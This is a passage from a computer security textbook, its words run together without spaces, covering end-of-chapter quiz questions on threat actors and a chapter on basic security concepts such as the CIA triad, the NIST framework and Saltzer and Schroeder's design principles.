4.Forwhatreason(s)dosomesecurityprofessionalsconsiderinsidersmoredangerousthanoutsideintruders?
A.Employees(insiders)areeasilycorruptedbycriminalandother
organizations.
B.Insidershavetheaccessandknowledgenecessarytocauseimmediatedamagetotheorganization.
C.Insidershaveknowledgeofthesecuritysystemsinplaceandarebetterabletoavoiddetection.
D.BothBandC
5.Theactofdeliberatelyaccessingcomputersystemsandnetworkswithoutauthorizationisgenerallyknownas:
A.Computerintrusion
B.Hacking
C.Cracking
D.Probing
6.Whatisthemostcommonproblem/threatanorganizationfaces?A.Viruses/worms
B.Scriptkiddies
C.Hackers
D.Hacktivists
7.Warfareconductedagainsttheinformationandinformationprocessingequipmentusedbyanadversaryisknownas:
A.Hacking
B.Cyberterrorism
C.Informationwarfare
D.Networkwarfare
8.Anattackerwhofeelsthatusinganimalstomakefurcoatsis
unethicalandthusdefacesthewebsiteofacompanythatsellsfurcoatsisanexampleof:
A.Informationwarfare
B.Hacktivisim
C.Cybercrusading
D.Elitehacking
9.Criminalorganizationswouldnormallybeclassifiedaswhattypeofthreat?
A.Unstructured
B.Unstructuredbuthostile
C.Structured
D.Highlystructured
10.Whichofthefollowingindividualshavetheabilitytonotonlywritescriptsthatexploitvulnerabilitiesbutalsodiscovernewvulnerabilities?
A.Elitehackers
B.Scriptkiddies
C.Hacktivists
D.Insiders
EssayQuiz1.Rereadthevariousexamplesofcomputercrimesatthebeginningof
thischapter.Categorizeeachaseitheracrimewherethecomputerwasthetargetofthecriminalactivityoracrimeinwhichthecomputerwasatoolinaccomplishingthecriminalactivity.
2.Afriendofyourshasjustbeenhiredbyanorganizationasitscomputersecurityofficer.Yourfriendisabitnervousaboutthisnewjobandhascometoyou,knowingthatyouaretakingacomputersecurityclass,toaskyouradviceonmeasuresthatcanbetakenthatmighthelppreventanintrusion.Whatthreethingscanyousuggestthataresimplebutcantremendouslyhelplimitthepossibilityofanattack?
3.Discussthemajordifferencebetweenatargetofopportunityattackandatargetedattack.Whichdoyoubelieveisthemorecommonone?
LabProject
•LabProject1.1Anumberofdifferentexamplesofcomputercrimeswerediscussedinthischapter.Similaractivitiesseemtohappendaily.DoasearchontheInternettoseewhatotherexamplesyoucanfind.Tryandobtainthemostrecentexamplespossible.
chapter2 GeneralSecurityConcepts
I
“Apeoplethatvaluesitsprivilegesaboveitsprinciplessoonlosesboth.”
—DWIGHTD.EISENHOWER
Inthischapter,youwilllearnhowto
Definebasictermsassociatedwithcomputerandinformationsecurity
Identifythebasicapproachestocomputerandinformationsecurity
Identifythebasicprinciplesofcomputerandinformationsecurity
Distinguishamongvariousmethodstoimplementaccesscontrols
Describemethodsusedtoverifytheidentityandauthenticityofanindividual
Recognizesomeofthebasicmodelsusedtoimplementsecurityinoperatingsystems
nChapter1,youlearnedaboutsomeofthevariousthreatsthatwe,assecurityprofessionals,faceonadailybasis.Inthischapter,youstartexploringthefieldofcomputersecurity.Computersecurityhasaseries
offundamentalconceptsthatsupportthediscipline.Inthischapterwewillbeginwithanexaminationofsecuritymodelsandconceptsandproceedtoseehowtheyareoperationallyemployed.
BasicSecurityTerminologyThetermhackinghasbeenusedfrequentlyinthemedia.Ahackerwasonceconsideredanindividualwhounderstoodthetechnicalaspectsofcomputeroperatingsystemsandnetworks.Hackerswereindividualsyouturnedtowhenyouhadaproblemandneededextremetechnicalexpertise.Today,primarilyasaresultofthemedia,thetermisusedmoreoftentorefertoindividualswhoattempttogainunauthorizedaccesstocomputersystemsornetworks.Whilesomewouldprefertousethetermscrackerandcrackingwhenreferringtothisnefarioustypeofactivity,theterminologygenerallyacceptedbythepublicisthatofhackerandhacking.Arelatedtermthatmaysometimesbeseenisphreaking,whichrefersto
the“hacking”ofthesystemsandcomputersusedbyatelephonecompanytooperateitstelephonenetwork.
Thefieldofcomputersecurityconstantlyevolves,introducingnewtermsfrequently,whichareoftencoinedbythemedia.Makesuretolearnthemeaningoftermssuchashacking,phreaking,vishing,phishing,pharming,andspearphishing.Someofthesehavebeenaroundformanyyears,suchashacking,whereasothershaveappearedonlyinthelastfewyears,suchasspearphishing.
SecurityBasicsComputersecurityitselfisatermthathasmanymeaningsandrelatedterms.Computersecurityentailsthemethodsusedtoensurethatasystemissecure.Subjectssuchasauthenticationandaccesscontrolsmustbeaddressedinbroadtermsofcomputersecurity.Seldomintoday’sworldarecomputersnotconnectedtoothercomputersinnetworks.Thisthenintroducesthetermnetworksecuritytorefertotheprotectionofthemultiplecomputersandotherdevicesthatareconnectedtogether.Relatedtothesetwotermsaretwoothers:informationsecurityandinformationassurance,whichplacethefocusofthesecurityprocessnotonthehardwareandsoftwarebeingusedbutonthedatathatisprocessedbythem.Assurancealsointroducesanotherconcept,thatoftheavailabilityofthesystemsandinformationwhenwewantthem.Thecommonpressandmanyprofessionalshavesettledoncybersecurityasthetermtodescribethefield.StillanothertermthatmaybeheardinthesecurityworldisCOMSEC,whichstandsforcommunicationssecurityanddealswiththesecurityoftelecommunicationsystems.Cybersecurityhasbecomeregularheadlinenewsthesedays,with
reportsofbreak-ins,databreaches,fraud,andahostofothercalamities.Thegeneralpublichasbecomeincreasinglyawareofitsdependenceoncomputersandnetworksandconsequentlyhasalsobecomeinterestedin
thesecurityofthesesamecomputersandnetworks.Asaresultofthisincreasedattentionbythepublic,severalnewtermshavebecomecommonplaceinconversationsandprint.Termssuchashacking,virus,TCP/IP,encryption,andfirewallsarenowfrequentlyencounteredinmainstreamnewsmediaandhavefoundtheirwayintocasualconversations.Whatwasoncethepurviewofscientistsandengineersisnowpartofoureverydaylife.Withourincreaseddailydependenceoncomputersandnetworksto
conducteverythingfrommakingpurchasesatourlocalgrocerystore,banking,tradingstocks,andreceivingmedicaltreatmenttodrivingourchildrentoschool,ensuringthatcomputersandnetworksaresecurehasbecomeofparamountimportance.Computersandtheinformationtheymanipulatehasbecomeapartofvirtuallyeveryaspectofourlives.
The“CIA”ofSecurityAlmostfromitsinception,thegoalofcomputersecurityhasbeenthreefold:confidentiality,integrity,andavailability—the“CIA”ofsecurity.Thepurposeofconfidentialityistoensurethatonlythoseindividualswhohavetheauthoritytoviewapieceofinformationmaydoso.Nounauthorizedindividualshouldeverbeabletoviewdatatheyarenotentitledtoaccess.Integrityisarelatedconceptbutdealswiththegenerationandmodificationofdata.Onlyauthorizedindividualsshouldeverbeabletocreateorchange(ordelete)information.Thegoalofavailabilityistoensurethatthedata,orthesystemitself,isavailableforusewhentheauthorizeduserwantsit.
TechTip
CIAofSecurityWhilethereisnouniversalagreementonauthentication,auditability,andnonrepudiationasadditionstotheoriginalCIAofsecurity,thereislittledebateoverwhetherconfidentiality,integrity,andavailabilityarebasicsecurityprinciples.Understandtheseprinciples,becauseoneormoreofthemarethereasonmostsecurityhardware,software,policies,and
proceduresexist.
Asaresultoftheincreaseduseofnetworksforcommerce,twoadditionalsecuritygoalshavebeenaddedtotheoriginalthreeintheCIAofsecurity.Authenticationattemptstoensurethatanindividualiswhotheyclaimtobe.Theneedforthisinanonlinetransactionisobvious.Relatedtothisisnonrepudiation,whichdealswiththeabilitytoverifythatamessagehasbeensentandreceivedandthatthesendercanbeidentifiedandverified.Therequirementforthiscapabilityinonlinetransactionsshouldalsobereadilyapparent.Recentemphasisonsystemsassurancehasraisedthepotentialinclusionofthetermauditability,whichreferstowhetheracontrolcanbeverifiedtobefunctioningproperly.Insecurity,itisimperativethatwecantrackactionstoensurewhathasorhasnotbeendone.
TheOperationalModelofComputerSecurityFormanyyears,thefocusofsecuritywasonprevention.Ifwecouldpreventeveryonewhodidnothaveauthorizationfromgainingaccesstoourcomputersystemsandnetworks,thenweassumedthatwehadachievedsecurity.Protectionwasthusequatedwithprevention.Whilethebasicpremiseofthisistrue,itfailstoacknowledgetherealitiesofthenetworkedenvironmentoursystemsarepartof.Nomatterhowwellweseemtodoinpreventiontechnology,somebodyalwaysseemstofindawayaroundoursafeguards.Whenthishappens,oursystemisleftunprotected.Thus,weneedmultiplepreventiontechniquesandalsotechnologytoalertuswhenpreventionhasfailedandtoprovidewaystoaddresstheproblem.Thisresultsinamodificationtoouroriginalsecurityequationwiththeadditionoftwonewelements—detectionandresponse.Oursecurityequationthusbecomes:
Protection=Prevention+(Detection+Response)Thisisknownastheoperationalmodelofcomputersecurity.Everysecuritytechniqueandtechnologyfallsintoatleastoneofthethree
elementsoftheequation.ExamplesofthetypesoftechnologyandtechniquesthatrepresenteacharedepictedinFigure2.1.
•Figure2.1Sampletechnologiesintheoperationalmodelofcomputersecurity
CybersecurityFrameworkModelIn2013,PresidentObamasignedanexecutiveorderdirectingtheU.S.NationalInstituteofScienceandTechnology(NIST)toworkwithindustryanddevelopacybersecurityframework.Thiswasinresponsetoseveralsignificantcybersecurityeventswherethevictimcompaniesappearedtobeunprepared.Theresultingframework,titledFrameworkforImprovingCriticalInfrastructureCybersecurity,wascreatedasavoluntarysystem,basedonexistingstandards,guidelines,andpractices,tofacilitateadoptionandacceptanceacrossawidearrayofindustries.
TechTip
CybersecurityFrameworkTheNISTCybersecurityFrameworkisarisk-basedapproachtoimplementationofcybersecurityactivitiesinanenterprise.Theframeworkprovidesacommontaxonomyofstandards,guidelines,andpracticesthatcanbeemployedtostrengthencybersecurityefforts.TheframeworkcanbeobtainedfromNIST:
www.nist.gov/cyberframework/upload/cybersecurity-framework-021214-final.pdf
TheCybersecurityFrameworkprovidesacommontaxonomyandmechanismtoassistinaligningmanagementpracticeswithexistingstandards,guidelines,andpractices.Itspurposeistocomplementandenhanceriskmanagementeffortsthrough
1.Determiningtheircurrentcybersecurityposture2.Documentingtheirdesiredtargetstatewithrespecttocybersecurity3.Determiningandprioritizingimprovementandcorrectiveactions4.Measuringandmonitoringprogresstowardgoals5.Creatingacommunicationmechanismforcoordinationamongstakeholders
Theframeworkiscomposedoffivecorefunctions,asillustratedinFigure2.2.Twoofthesecorefunctions,IdentifyandProtect,describeactionstakenbeforeanincident.Detectisthecorefunctionassociatedwithintrusiondetectionorthebeginningofanincidentresponse.Thelasttwo,RespondandRecover,detailactionsthattakeplaceduringthepost-incidentresponse.Examplesoftheitemsundereachfunctionareillustratedinthefigure.Inadditiontothefivefunctions,theframeworkhaslevelsofimplementationsreferredtoastiers.Thesetiersrepresenttheorganization’sabilityfromPartial(Tier1)toAdaptive(Tier4).
•Figure2.2CybersecurityFrameworkcorefunctions
SecurityTenetsInadditiontotheCIAelements,thereareadditionaltenetsthatformabasisforsystemsecurity.Thethreeoperationaltenetsfoundinsecuredeploymentsaresessionmanagement,exceptionmanagement,andconfigurationmanagement.
SessionManagementSessionmanagementisthesetofactivitiesemployedtoestablishacommunicationchannelbetweentwoparties,identifyingeachinamannerthatallowsfutureactivitywithoutrenewedauthentication.Sessionmanagementallowsanapplicationtoauthenticateonceandhavesubsequentactivitiesascribedtotheauthenticateduser.Sessionsarefrequentlyusedinwebapplicationstopreservestateanduserinformationbetweennormallystatelessclicks.SessionsaretypicallyidentifiedbyanIDthatisknowntobothsidesof
theconversation.ThisIDcanbeusedasatokenforfutureidentification.Ifconfidentialityisrequired,thenthechannelshouldbesecuredbyanappropriatelevelofcryptographicprotection.
TechTip
SessionManagementCheatSheetSessionmanagementisacommontaskforwebapplications,andtheOpenWebApplicationSecurityProject(OWASP)hasacheatsheettoassistinthecorrectimplementationofsessionmanagement.Seehttps://www.owasp.org/index.php/Session_Management_Cheat_Sheet.
Sessionmanagementincludesalltheactivitiesnecessarytomanagethesession,fromestablishment,duringuse,andatcompletionoftheconversation.Becausethesessionrepresentsthecontinuityofasecurity
conditionestablishedduringauthentication,thelevelofprotectionthatshouldbeaffordedtothesessionIDshouldbecommensuratewiththelevelofsecurityinitiallyestablished.
ExceptionManagementExceptionsaretheinvocationofconditionsthatfalloutsidethenormalsequenceofoperation.Whetherbyerrorormaliciousaction,exceptionsarechangestonormalprocessingandneedtobemanaged.Thespecialprocessingrequiredbyconditionsthatfalloutsidenormalparameterscanresultinerrorseitherlocallyorinfollow-onprocessesinasystem.Thehandlingofexceptions,referredtoasexceptionhandling,isanimportantconsiderationduringsoftwaredevelopment.Exceptionmanagementismorethanjustexceptionhandlinginsoftware
development.Whentheoperationofasystemencountersanexception,whetheritisinvokedbyaperson,process,technology,orcombination,thesystemmusteffectivelyhandlethecondition.Thiscanmeanmanydifferentthings,sometimesevenoperatingoutsidenormalpolicylimits.Exceptionmanagementcanalsobenontechnicalinnature:systemsorenvironmentsthatcannotfolloworganizationalsecuritypolicy,forexample,mustbedocumented,exceptionsmustbeapproved,andmitigationsmustbeputinplacetolowertheriskassociatedwithexceptionstopolicy.Thebottomlineissimple:eitherthesystemmusthandletheconditionandrecover,oritmustfailandberecoveredbyseparateaction.Designinginexceptionhandlingmakesasystemmoreresilient,becauseexceptionswillhappen,andhowtheyarehandledistheonlyunknownoutcome.
ConfigurationManagementConfigurationmanagementiskeytotheproperoperationofITsystems.ITsystemsarefirstandforemostsystems,groupsofelementsthatworktogethertoachieveadesiredresultantprocess.Theproperconfigurationandprovisioningofallofthecomponentsinasystemisessentialtotheproperoperationofthesystem.Thedesignandoperationoftheelements
toensuretheproperfunctionalenvironmentofasystemisreferredtoasconfigurationmanagement.ConfigurationmanagementisakeyoperationprincipleandisthoroughlycoveredinChapter21.
SecurityApproachesTherearemultipleapproachesanorganizationcantaketoaddresstheprotectionofitsnetworks:ignoresecurityissues,providehostsecurity,providenetwork-levelsecurity,orprovideacombinationofthelattertwo.Themiddletwo,hostsecurityandnetwork-levelsecurity,havepreventionaswellasdetectionandresponsecomponents.Ratherthanviewthesetwoapproachesasindependentsolutions,amatureorganizationusesbothinacomplementaryfashion.Ifanorganizationdecidestoignoresecurity,ithaschosentoutilizethe
minimalamountofsecuritythatisprovidedwithitsworkstations,servers,anddevices.Noadditionalsecuritymeasureswillbeimplemented.Each“outofthebox”systemhascertainsecuritysettingsthatcanbeconfigured,andtheyshouldbe.Toactuallyprotectanentirenetwork,however,requiresworkinadditiontothefewprotectionmechanismsthatcomewithsystemsbydefault.
TechTip
GotNetwork?AclassicblackT-shirtinthesecurityindustrysays“gotroot?”It’satakeoffonthesuccessfuladcampaign“gotmilk?”andindicatesthepowerofrootprivilege.Similarto“gotroot?”is“gotnetwork?”,forifyoutruly“own”thenetwork,thenyouhavesignificantcontroloverwhatpassesacrossitandcanresultininformationdisclosure.Toensureasecureposture,bothnetworkandhostaccesslevelsmustbecontrolled.
HostSecurityHostsecuritytakesagranularviewofsecuritybyfocusingonprotecting
eachcomputeranddeviceindividuallyinsteadofaddressingprotectionofthenetworkasawhole.Whenhostsecurityisused,eachcomputerisreliedupontoprotectitself.Ifanorganizationdecidestoimplementonlyhostsecurityanddoesnotincludenetworksecurity,thereisahighprobabilityofintroducingoroverlookingvulnerabilities.Mostenvironmentsarefilledwithdifferentoperatingsystems(Windows,UNIX,Linux,OSX),differentversionsofthoseoperatingsystems,anddifferenttypesofinstalledapplications.Eachoperatingsystemhassecurityconfigurationsthatdifferfromthoseofothersystems,anddifferentversionsofthesameoperatingsystemmayinfacthaveconfigurationvariationsbetweenthem.Hostsecurityisimportantandshouldalwaysbeaddressed.Security,
however,shouldnotstopthere,ashostsecurityisacomplementaryprocesstobecombinedwithnetworksecurity.Ifindividualhostcomputershavevulnerabilitiesembodiedwithinthem,thennetworksecuritycanprovideanotherlayerofprotectionthatwill,hopefully,stopanyintruderswhohavegottenthatfarintotheenvironment.
Alongtimediscussionhascenteredonwhetherhost-ornetwork-basedsecurityismoreimportant.Mostsecurityexpertsnowgenerallyagreethatacombinationofbothisneededtoadequatelyaddressthewiderangeofpossiblesecuritythreats.Certainattacksaremoreeasilyspottedandsomeattacksaremoreeasilypreventedusingtoolsdesignedforoneortheotheroftheseapproaches.
NetworkSecurityInsomesmallerenvironments,hostsecuritybyitselfmaybeanoption,butassystemsbecomeconnectedintonetworks,securityshouldincludetheactualnetworkitself.Innetworksecurity,anemphasisisplacedoncontrollingaccesstointernalcomputersfromexternalentities.Thiscontrolcanbethroughdevicessuchasrouters,firewalls,authenticationhardwareandsoftware,encryption,andintrusiondetectionsystems(IDSs).
Networkenvironmentstendtobeuniqueentitiesbecauseusuallynotwonetworkshaveexactlythesamenumberofcomputers,thesameapplicationsinstalled,thesamenumberofusers,theexactsameconfigurations,orthesameavailableservers.Theywillnotperformthesamefunctionsorhavethesameoverallarchitecture.Sincenetworkshavesomanyvariations,therearemanydifferentwaysinwhichtheycanbeprotectedandconfigured.Thischaptercoverssomefoundationalapproachestonetworkandhostsecurity.Eachapproachmaybeimplementedinamyriadofways,butbothnetworkandhostsecurityneedtobeaddressedforaneffectivetotalsecurityprogram.
TechTip
SecurityDesignPrinciplesTheeightdesignprinciplesfromSaltzerandSchroederarelistedandparaphrasedhere:
LeastprivilegeUseminimumprivilegesnecessarytoperformatask.
SeparationofprivilegeAccessshouldbebasedonmorethanoneitem.Fail-safedefaultsDenybydefault(implicitdeny)andonlygrantaccesswithexplicitpermission.
EconomyofmechanismMechanismsshouldbesmallandsimple.CompletemediationProtectionmechanismsshouldcovereveryaccesstoeveryobject.
OpendesignProtectionmechanismsshouldnotdependuponsecrecyofthemechanismitself.
LeastcommonmechanismProtectionmechanismsshouldbesharedtotheleastdegreepossibleamongusers.
PsychologicalacceptabilityProtectionmechanismsshouldnotimpactusers,oriftheydo,theimpactshouldbeminimal.
Ref:J.H.SaltzerandM.D.Schroeder,“TheProtectionofInformationinComputerSystems,”Proc.IEEE,vol.63,no.9,1975,pp.1278–1308.
SecurityPrinciples
Inthemid-1970s,twocomputerscientistsfromMIT,JeromeSaltzerandMichaelSchroeder,publishedapaperondesignprinciplesforasecurecomputersystem.TheSaltzerandSchroederpaper,titled“TheProtectionofInformationinComputerSystems,”hasbeenhailedasaseminalworkincomputersecurity,andtheeightdesignprinciplesareasrelevanttodayastheywerein1970s.Theseprinciplesareusefulinsecuresystemdesignandoperation.
LeastPrivilegeOneofthemostfundamentalprinciplesinsecurityisleastprivilege.Thisconceptisapplicabletomanyphysicalenvironmentsaswellasnetworkandhostsecurity.Leastprivilegemeansthatasubject(whichmaybeauser,application,orprocess)shouldhaveonlythenecessaryrightsandprivilegestoperformitstaskwithnoadditionalpermissions.Limitinganobject’sprivilegeslimitstheamountofharmthatcanbecaused,thuslimitinganorganization’sexposuretodamage.Usersmayhaveaccesstothefilesontheirworkstationsandaselectsetoffilesonafileserver,butnoaccesstocriticaldatathatisheldwithinthedatabase.Thisrulehelpsanorganizationprotectitsmostsensitiveresourcesandhelpsensurethatwhoeverisinteractingwiththeseresourceshasavalidreasontodoso.
TryThis!ExamplesoftheLeastPrivilegePrincipleThesecurityconceptofleastprivilegeisnotuniquetocomputersecurity.Ithasbeenpracticedbyorganizationssuchasfinancialinstitutionsandgovernmentsforcenturies.Basicallyitsimplymeansthatindividualsaregivenonlytheabsoluteminimumofprivilegesthatarerequiredtoaccomplishtheirassignedjob.Examinethesecuritypoliciesthatyourorganizationhasinplaceandseeifyoucanidentifyexamplesofwheretheprincipleofleastprivilegehasbeenused.
Theconceptofleastprivilegeappliestomorenetworksecurityissuesthanjustprovidinguserswithspecificrightsandpermissions.Whentrustrelationshipsarecreated,theyshouldnotbeimplementedinsuchaway
thateveryonetrustseachothersimplybecauseitiseasier.Onedomainshouldtrustanotherforveryspecificreasons,andtheimplementersshouldhaveafullunderstandingofwhatthetrustrelationshipallowsbetweentwodomains.Ifonedomaintrustsanother,doalloftheusersautomaticallybecometrusted,andcantheythuseasilyaccessanyandallresourcesontheotherdomain?Isthisagoodidea?Isthereamoresecurewayofprovidingthesamefunctionality?Ifatrustedrelationshipisimplementedsuchthatusersinonegroupcanaccessaplotterorprinterthatisavailableononlyonedomain,itmightmakesensetosimplypurchaseanotherplottersothatother,morevaluableorsensitiveresourcesarenotaccessiblebytheentiregroup.Anotherissuethatfallsundertheleastprivilegeconceptisthesecurity
contextinwhichanapplicationruns.Allapplications,scripts,andbatchfilesruninthesecuritycontextofaspecificuseronanoperatingsystem.Theyexecutewithspecificpermissionsasiftheywereauser.TheapplicationmaybeMicrosoftWordandruninthespaceofaregularuser,oritmaybeadiagnosticprogramthatneedsaccesstomoresensitivesystemfilesandsomustrununderanadministrativeuseraccount,oritmaybeaprogramthatperformsbackupsandsoshouldoperatewithinthesecuritycontextofabackupoperator.Thecruxofthisissueisthataprogramshouldexecuteonlyinthesecuritycontextthatisneededforthatprogramtoperformitsdutiessuccessfully.Inmanyenvironments,peopledonotreallyunderstandhowtomakeprogramsrununderdifferentsecuritycontexts,oritmayjustseemeasiertohaveallprogramsrunundertheadministratoraccount.Ifattackerscancompromiseaprogramorservicerunningundertheadministratoraccount,theyhaveeffectivelyelevatedtheiraccesslevelandhavemuchmorecontroloverthesystemandmanymorewaystocausedamage.
TryThis!ControlofResourcesBeingabletoapplytheappropriatesecuritycontroltofileandprintresourcesisanimportant
aspectoftheleastprivilegesecurityprinciple.Howthisisimplementedvariesdependingontheoperatingsystemthatthecomputerruns.Checkhowtheoperatingsystemthatyouuseprovidesfortheabilitytocontrolfileandprintresources.
SeparationofPrivilegeProtectionmechanismscanbeemployedtograntaccessbasedonavarietyoffactors.Oneofthekeyprinciplesistobasedecisionsonmorethanasinglepieceofinformation.Theprincipleofseparationofprivilegestatesthattheprotectionmechanismshouldbeconstructedsothatitusesmorethanonepieceofinformationtomakeaccessdecisions.Applyingthisprincipletothepeoplesideofthesecurityfunctionresultsintheconceptofseparationofduties.Theprincipleofseparationofprivilegeisapplicabletophysical
environmentsaswellasnetworkandhostsecurity.Whenappliedtopeople’sactions,separationofdutiesspecifiesthatforanygiventask,morethanoneindividualneedstobeinvolved.Thetaskisbrokenintodifferentduties,eachofwhichisaccomplishedbyaseparateindividual.Byimplementingataskinthismanner,nosingleindividualcanabusethesystemforhisorherowngain.Thisprinciplehasbeenimplementedinthebusinessworld,especiallyfinancialinstitutions,formanyyears.Asimpleexampleisasysteminwhichoneindividualisrequiredtoplaceanorderandaseparatepersonisneededtoauthorizethepurchase.Whileseparationofdutiesprovidesacertainlevelofchecksand
balances,itisnotwithoutitsowndrawbacks.Chiefamongtheseisthecostrequiredtoaccomplishthetask.Thiscostismanifestedinbothtimeandmoney.Morethanoneindividualisrequiredwhenasinglepersoncouldaccomplishthetask,thuspotentiallyincreasingthecostofthetask.Inaddition,withmorethanoneindividualinvolved,acertaindelaycanbeexpectedbecausethetaskmustproceedthroughitsvarioussteps.
Fail-SafeDefaultsToday,theInternetisnolongerthefriendlyplaygroundofresearchersthatitoncewas.Thishasresultedindifferentapproachesthatmightatfirst
seemlessthanfriendlybutthatarerequiredforsecuritypurposes.Fail-safedefaultsisaconceptthatwhensomethingfails,itshoulddosotoasafestate.Oneapproachisthataprotectionmechanismshoulddenyaccessbydefault,andgrantaccessonlywhenexplicitpermissionexists.Thisissometimescalleddefaultdeny,andthecommonoperationaltermforthisapproachisimplicitdeny.Frequentlyinthenetworkworld,administratorsmakemanydecisions
concerningnetworkaccess.Oftenaseriesofruleswillbeusedtodeterminewhetherornottoallowaccess(whichisthepurposeofanetworkfirewall).Ifaparticularsituationisnotcoveredbyanyoftheotherrules,theimplicitdenyapproachstatesthataccessshouldnotbegranted.Inotherwords,ifnorulewouldallowaccess,thenaccessshouldnotbegranted.Implicitdenyappliestosituationsinvolvingbothauthorizationandaccess.Thealternativetoimplicitdenyistoallowaccessunlessaspecificrule
forbidsit.Anotherexampleofthesetwoapproachesisinprogramsthatmonitorandblockaccesstocertainwebsites.Oneapproachistoprovidealistofspecificsitesthatauserisnotallowedtoaccess.Accesstoanysitenotonthelistwouldbeimplicitlyallowed.Theoppositeapproach(theimplicitdenyapproach)wouldblockallaccesstositesthatarenotspecificallyidentifiedasauthorized.Asyoucanimagine,dependingonthespecificapplication,oneortheotherapproachwillbemoreappropriate.Whichapproachyouchoosedependsonthesecurityobjectivesandpoliciesofyourorganization.
Implicitdenyisanotherfundamentalprincipleofsecurityandstudentsneedtobesurethattheyunderstandthisprinciple.Similartoleastprivilege,thisprinciplestatesthatifyouhaven’tspecificallybeenallowedaccess,thenitshouldbedenied.
EconomyofMechanism
Thetermssecurityandcomplexityareoftenatoddswitheachother,becausethemorecomplexsomethingis,theharderitistounderstand,andyoucannottrulysecuresomethingifyoudonotunderstandit.Anotherreasoncomplexityisaproblemwithinsecurityisthatitusuallyallowstoomanyopportunitiesforsomethingtogowrong.Ifanapplicationhas4000linesofcode,therearealotfewerplacesforbufferoverflows,forexample,thaninanapplicationoftwomillionlinesofcode.Theprincipleofeconomyofmechanismisdescribedasalwaysusingsimplesolutionswhenavailable.
Keepitsimple:Anothermethodoflookingattheprincipleofeconomyofmechanismisthattheprotectionmechanismshouldbesmallandsimple.
Anexampleoftheprincipleconcernsthenumberofservicesthatyouallowyoursystemtorun.Defaultinstallationsofcomputeroperatingsystemsoftenleavemanyservicesrunning.Thekeep-it-simpleprincipletellsustoeliminateordisablethoseservicesthatwedon’tneed.Thisisalsoagoodideafromasecuritystandpointbecauseitresultsinfewerapplicationsthatcanbeexploitedandfewerservicesthattheadministratorisresponsibleforsecuring.Thegeneralruleofthumbistoeliminateordisableallnonessentialservicesandprotocols.Thisofcourseleadstothequestion,howdoyoudeterminewhetheraserviceorprotocolisessentialornot?Ideally,youshouldknowwhatyourcomputersystemornetworkisbeingusedfor,andthusyoushouldbeabletoidentifyandactivateonlythoseelementsthatareessential.Foravarietyofreasons,thisisnotaseasyasitsounds.Alternatively,astringentsecurityapproachthatonecantakeistoassumethatnoserviceisnecessary(whichisobviouslyabsurd)andactivateservicesandportsonlyastheyarerequested.Whateverapproachistaken,thereisanever-endingstruggletotrytostrikeabalancebetweenprovidingfunctionalityandmaintainingsecurity.
CompleteMediationOneofthefundamentaltenetsofaprotectionsystemistocheckallaccessrequestsforpermission.Eachandeverytimeasubjectrequestsaccesstoanobject,thepermissionmustbechecked;otherwiseanattackermightgainunauthorizedaccesstoanobject.Completemediationreferstotheconceptthateachandeveryrequestshouldbeverified.Whenpermissionsareverifiedthefirsttime,andtheresultiscachedforsubsequentuse,performancemaybeincreased,butthisalsoopensthedoortopermissionerrors.Shouldapermissionchangesubsequenttothefirstuse,thischangewouldnotbeappliedtotheoperationsaftertheinitialcheck.Completemediationalsoreferstoensuringthatalloperationsgo
throughtheprotectionmechanism.Whensecuritycontrolsareaddedafterthefact,itisimportanttomakecertainthatallprocessflowsarecoveredbythecontrols,includingexceptionsandout-of-bandrequests.Ifanautomatedprocessischeckedinonemanner,butamanualpaperbackupprocesshasaseparatepath,itisimportanttoensureallchecksarestillinplace.Whenasystemundergoesdisasterrecoveryorbusinesscontinuityprocesses,orbackupand/orrestoreprocesses,thesetoorequirecompletemediation.
OpenDesignTheprincipleofopendesignholdsthattheprotectionofanobjectshouldnotrelyuponsecrecyoftheprotectionmechanismitself.Thisprinciplehasbeenlongprovenincryptographiccircles,wherehidingthealgorithmultimatelyfailsandthetrueprotectionreliesuponthesecrecyandcomplexityofthekeys.Theprincipledoesnotexcludetheideaofusingsecrecy,butmerelystatesthat,onthefaceofit,secrecyofmechanismisnotsufficientforprotection.Anotherconceptinsecuritythatshouldbediscussedinthiscontextis
theideaofsecuritythroughobscurity.Inthiscase,securityisconsideredeffectiveiftheenvironmentandprotectionmechanismsareconfusingorthoughttobenotgenerallyknown.Securitythroughobscurityusesthe
approachofprotectingsomethingbyhidingit.Noncomputerexamplesofthisconceptincludehidingyourbriefcaseorpurseifyouleaveitinthecarsothatitisnotinplainview,hidingahousekeyunderadoormatorinaplanter,orpushingyourfavoriteicecreamtothebackofthefreezersothateveryoneelsethinksitisallgone.Theideaisthatifsomethingisoutofsight,itisoutofmind.Thisapproach,however,doesnotprovideactualprotectionoftheobject.Someonecanstillstealthepursebybreakingintothecar,liftthedoormatandfindthekey,ordigthroughtheitemsinthefreezertofindyourfavoriteicecream.Securitythroughobscuritymaymakesomeoneworkalittlehardertoaccomplishatask,butitdoesnotpreventanyonefromeventuallysucceeding.
TechTip
SecurityThroughObscurityTheprincipleofopendesignandthepracticeofsecuritybyobscuritymayseematoddswitheachother,butinrealitytheyarenot.Theprincipleofopendesignstatesthatsecrecyitselfcannotberelieduponasameansofprotection.Thepracticeofsecuritythroughobscurityisaprovenmethodofincreasingtheworkfactorthatanadversarymustexpendtosuccessfullyattackasystem.Byitself,obscurityisnotgoodprotection,butitcancomplementothercontrolswhenbothareproperlyemployed.
Similarapproachesareseenincomputerandnetworksecuritywhenattemptingtohidecertainobjects.Anetworkadministratormay,forinstance,moveaservicefromitsdefaultporttoadifferentportsothatotherswillnotknowhowtoaccessitaseasily,orafirewallmaybeconfiguredtohidespecificinformationabouttheinternalnetworkinthehopethatpotentialattackerswillnotobtaintheinformationforuseinanattackonthenetwork.Inmostsecuritycircles,securitythroughobscurityisconsideredapoor
approach,especiallyifitistheonlyapproachtosecurity.Securitythroughobscuritysimplyattemptstohideanobject;itdoesn’timplementasecuritycontroltoprotectit.Anorganizationcanusesecuritythrough
obscuritymeasurestotrytohidecriticalassets,butothersecuritymeasuresshouldalsobeemployedtoprovideahigherlevelofprotection.Forexample,ifanadministratormovesaservicefromitsdefaultporttoamoreobscureport,anattackercanstillactuallyfindthisservice;thusafirewallshouldbeusedtorestrictaccesstotheservice.Mostpeopleknowthatevenifyoudoshoveyouricecreamtothebackofthefreezer,someonemayeventuallyfindit.
